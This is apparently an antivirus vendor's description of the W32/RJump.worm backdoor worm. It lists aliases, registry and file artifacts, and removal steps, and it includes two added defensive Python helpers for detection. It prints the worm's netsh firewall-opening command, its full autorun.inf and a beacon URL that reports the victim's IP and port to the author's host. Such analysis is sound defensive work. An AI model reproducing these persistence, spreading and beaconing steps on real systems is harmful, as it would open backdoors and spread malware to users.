W32/RJump.worm

Type: Virus
SubType: Worm
Discovery Date: 06/20/2006
Length: varies
Minimum DAT: 4788 (06/20/2006)
Updated DAT: 5040 (05/28/2007)
Minimum Engine: 5.1.00
Description Added: 06/20/2006
Description Modified: 10/17/2006 5:32 PM (PT)
Risk Assessment
Corporate User: Low-Profiled
Home User: Low-Profiled


Overview

-- Update October 17, 2006 --
W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089

W32/RJump.worm is a worm written in the Python scripting language and converted into a Windows portable executable with the Py2Exe tool. It attempts to spread by copying itself to mapped and removable storage drives, and it also opens a backdoor on the infected system.

Aliases

  • Backdoor.Rajump (Symantec)
  • W32/Jisx.A.worm (Panda)
  • W32/RJump-C (Sophos)
  • W32/RJump.A!worm (Fortinet)
  • Win32/RJump.A (ESET)
  • Win32/RJump.A!Worm (CA)
  • Worm.RJump.A (BitDefender)
  • Worm.Win32.RJump.a (Kaspersky)
  • Worm/Rjump.E (Avira)
  • WORM_SIWEOL.B (TrendMicro)

Characteristics

Upon execution, the worm copies itself into the Windows directory:

  • %Windir%\RAVMON.EXE

It also writes a non-malicious "RavMonLog" file that contains the port number on which its backdoor component listens.

It adds the following registry value so that it is started automatically when Windows starts:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"RavAV" = "%Windir%\RAVMON.EXE"

Symptoms

W32/RJump.worm opens a port exception for its backdoor component in the built-in Windows XP firewall by running the following netsh command:

%Windir%\%Sysdir%\cmd.exe /c netsh firewall add portopening TCP 16942 NortonAV

Note: the backdoor port is chosen at random on each infected machine; 16942 is the value seen in the command above, and the actual port in use is the one recorded in the RavMonLog file. The exception name "NortonAV" is chosen to look like a legitimate security product.

The worm then reports the infected machine's IP address and backdoor port to the worm author by requesting the following URL:

  • http://natrocket.9966.[Removed]:5288/iesocks?peer_id=%s&port=%s&type=%s&ver=4sD
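The following triage helper is an added example for this section; it is not McAfee's code and not part of the worm. It parses the text output of `netsh firewall show portopening` (Windows XP SP2 layout, a constructed sample is embedded), reads the backdoor port out of a constructed RavMonLog (the description only says the file holds the port number; a bare number is assumed), flags any exception that matches the worm either by its hard-coded name or by the logged port, and emits the `netsh firewall delete portopening` and `reg delete` commands an administrator would run to undo the changes. The exception name "NortonAV", the Run value "RavAV" and port 16942 are taken from the description; everything else is assumed.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Tuple


class PortException(NamedTuple):
    port: int
    protocol: str
    mode: str
    name: str


# Constructed sample of `netsh firewall show portopening` output (Windows XP
# SP2 layout). The 16942/"NortonAV" row reproduces the exception the worm adds
# with the command quoted in the description; the other rows are the usual
# file-and-print-sharing defaults and are here for contrast.
SAMPLE_NETSH_OUTPUT = """\
Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service
16942  TCP       Enable   NortonAV
"""

# Constructed RavMonLog content. The description only says the file holds the
# backdoor's listening port; a bare decimal number is assumed here.
SAMPLE_RAVMONLOG = "16942\n"

PROFILE_RE = re.compile(r"^Port configuration for (\w+) profile:")
ROW_RE = re.compile(r"^\s*(\d{1,5})\s+(TCP|UDP)\s+(Enable|Disable)\s+(.+?)\s*$")


def parse_portopenings(text: str) -> Dict[str, List[PortException]]:
    """Parse netsh output into {profile: [PortException, ...]}."""
    profiles: Dict[str, List[PortException]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = PROFILE_RE.match(line)
        if m:
            current = m.group(1)
            profiles[current] = []
            continue
        m = ROW_RE.match(line)
        if m and current is not None:
            port, proto, mode, name = m.groups()
            profiles[current].append(PortException(int(port), proto, mode, name))
    return profiles


def backdoor_port_from_log(log_text: str) -> Optional[int]:
    """First port number found in RavMonLog; None if the file is empty or unparsable."""
    m = re.search(r"\b(\d{1,5})\b", log_text)
    return int(m.group(1)) if m else None


def find_suspicious(profiles: Dict[str, List[PortException]],
                    backdoor_port: Optional[int] = None,
                    exception_name: str = "NortonAV") -> List[Tuple[str, PortException]]:
    """Flag exceptions by the worm's hard-coded name, or by the port read from RavMonLog.

    Matching on the logged port is what catches an infection whose exception
    name differs: the port is random per machine, so it cannot be hard-coded.
    """
    hits: List[Tuple[str, PortException]] = []
    for profile, entries in profiles.items():
        for e in entries:
            by_name = e.name == exception_name
            by_port = backdoor_port is not None and e.protocol == "TCP" and e.port == backdoor_port
            if by_name or by_port:
                hits.append((profile, e))
    return hits


def removal_commands(hits: List[Tuple[str, PortException]]) -> List[str]:
    """Commands to run on the infected XP host: drop each flagged firewall
    exception (all profiles), then the Run value that restarts the worm."""
    cmds: List[str] = []
    seen = set()
    for _profile, e in hits:
        if (e.protocol, e.port) not in seen:
            seen.add((e.protocol, e.port))
            cmds.append(f"netsh firewall delete portopening {e.protocol} {e.port}")
    cmds.append(r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v RavAV /f')
    return cmds


if __name__ == "__main__":
    found = find_suspicious(parse_portopenings(SAMPLE_NETSH_OUTPUT),
                            backdoor_port_from_log(SAMPLE_RAVMONLOG))
    for profile, exc in found:
        print(f"[{profile}] {exc.protocol}/{exc.port} '{exc.name}' ({exc.mode})")
    print("\n".join(removal_commands(found)))
```

The generated commands only undo the firewall and registry changes; the running RAVMON.EXE process still has to be terminated and the file, the RavMonLog file and the copies on removable drives deleted, which is what the DAT-based scan does.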

Method of Infection

W32/RJump.worm enumerates all mapped and removable storage drives on the infected system and drops the following files into the root folder of each drive it can write to:

  • autorun.inf  --> used to run the worm when the drive is accessed
  • msvcr71.dll  --> clean Microsoft Visual C++ 7.1 runtime library (Visual Studio .NET 2003), which the Py2Exe-packaged executable needs in order to run
  • ravmon.exe   --> copy of the worm

The contents of the autorun.inf are as follows:

[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=Auto


Infection occurs when a removable storage device or mapped drive carrying a copy of W32/RJump.worm is accessed and the user accepts the AutoPlay prompt, which executes the worm; because the autorun.inf also sets "shell=Auto", the worm is the drive's default action, so simply double-clicking the drive in Explorer runs it as well. Note that the autorun.inf refers to the dropped copy as RavMonE.exe while the file list above names it ravmon.exe; check for both names.
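To show exactly which of the autorun.inf entries above get the worm executed, here is an added example (not code from the McAfee description or from the worm) that parses an autorun.inf the way Windows reads it, case-insensitively, and reports every hook that can launch a program and whether the file redirects the drive's default double-click action. It runs on the worm's autorun.inf as reproduced above and on a constructed benign one for contrast; the benign sample and the "suspicious" heuristic are assumptions for the example.

```python
import configparser
from typing import Dict

# The autorun.inf reproduced in the description above (backslashes escaped
# for the Python string literal).
WORM_AUTORUN = """\
[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\\Auto\\command=RavMonE.exe e
shell=Auto
"""

# Constructed benign counterpart: sets only an icon and a label, launches nothing.
BENIGN_AUTORUN = """\
[autorun]
icon=setup.exe,0
label=Vendor Driver CD
"""


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the [AutoRun] keys, lower-cased as Windows treats them.

    The section name and keys are matched case-insensitively; strict=False
    tolerates duplicate keys, which hand-written autorun.inf files often have.
    """
    cp = configparser.RawConfigParser(delimiters=("=",), strict=False)
    cp.optionxform = str.lower
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "autorun":
            return dict(cp.items(section))
    return {}


def launch_hooks(keys: Dict[str, str]) -> Dict[str, str]:
    """Map each hook that can run a program to the command line it would run.

    open= and shellexecute= are what AutoPlay offers to run when the drive is
    inserted or opened. shell\\<verb>\\command= adds a context-menu verb, and
    shell=<verb> makes that verb the default, so a plain double-click on the
    drive in Explorer runs it. That is how the worm gets executed from a
    removable drive even when AutoPlay itself only shows a prompt.
    """
    hooks: Dict[str, str] = {}
    for k in ("open", "shellexecute"):
        if k in keys:
            hooks[k] = keys[k]
    default_verb = (keys.get("shell") or "").lower()
    for k, v in keys.items():
        parts = k.split("\\")
        if len(parts) == 3 and parts[0] == "shell" and parts[2] == "command":
            label = k
            if parts[1] == default_verb:
                label += " (default double-click action)"
            hooks[label] = v
    return hooks


def executable_of(command: str) -> str:
    """First token of the command line, lower-cased; '' for an empty command."""
    tokens = command.strip().split()
    return tokens[0].lower() if tokens else ""


def assess(text: str) -> dict:
    """Summarise what an autorun.inf would launch and whether it hijacks the drive."""
    keys = parse_autorun(text)
    hooks = launch_hooks(keys)
    executables = sorted({executable_of(c) for c in hooks.values()} - {""})
    hijacks_default = any(label.endswith("(default double-click action)") for label in hooks)
    return {
        "hooks": hooks,
        "executables": executables,
        "hijacks_default_action": hijacks_default,
        # Heuristic (assumption): open= alone is common on legitimate install
        # media; redirecting the drive's default action is the worm pattern.
        "suspicious": hijacks_default,
    }


if __name__ == "__main__":
    for name, sample in (("worm", WORM_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, assess(sample))
```

Run against a drive root, the executables it reports (here ravmone.exe) are the files to collect and delete along with the autorun.inf itself.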

Removal

A combination of the latest DATs and the Engine will detect and remove this threat. AVERT recommends that users not trust seemingly familiar or safe file icons, particularly for files received via P2P clients, IRC, e-mail or other media where users share files.

Additional Windows ME/XP removal considerations

Stinger:

A Stinger standalone removal tool has been released to assist in repairing this threat.

Variants

    N/A